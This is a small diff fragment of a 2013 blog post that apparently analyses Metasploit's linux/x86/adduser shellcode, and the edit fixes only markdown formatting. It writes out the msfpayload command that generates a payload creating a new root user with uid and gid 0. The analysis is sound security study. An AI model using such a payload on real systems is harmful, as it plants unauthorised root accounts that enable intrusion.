livz/livz.github.io/_posts/2013-08-04-SLAE-Metasploit-Linux-adduser-shellcode-analysis.md

 # msfpayload linux/x86/adduser USER=jsmith PASS=ok  C
 ```

-This will generate a payload that will create a new -`root`_ user, with uid and gid equal to 0.
+This will generate a payload that will create a new _`root`_ user, with uid and gid equal to 0.
 ```c
 /*
  * linux/x86/adduser - 93 bytes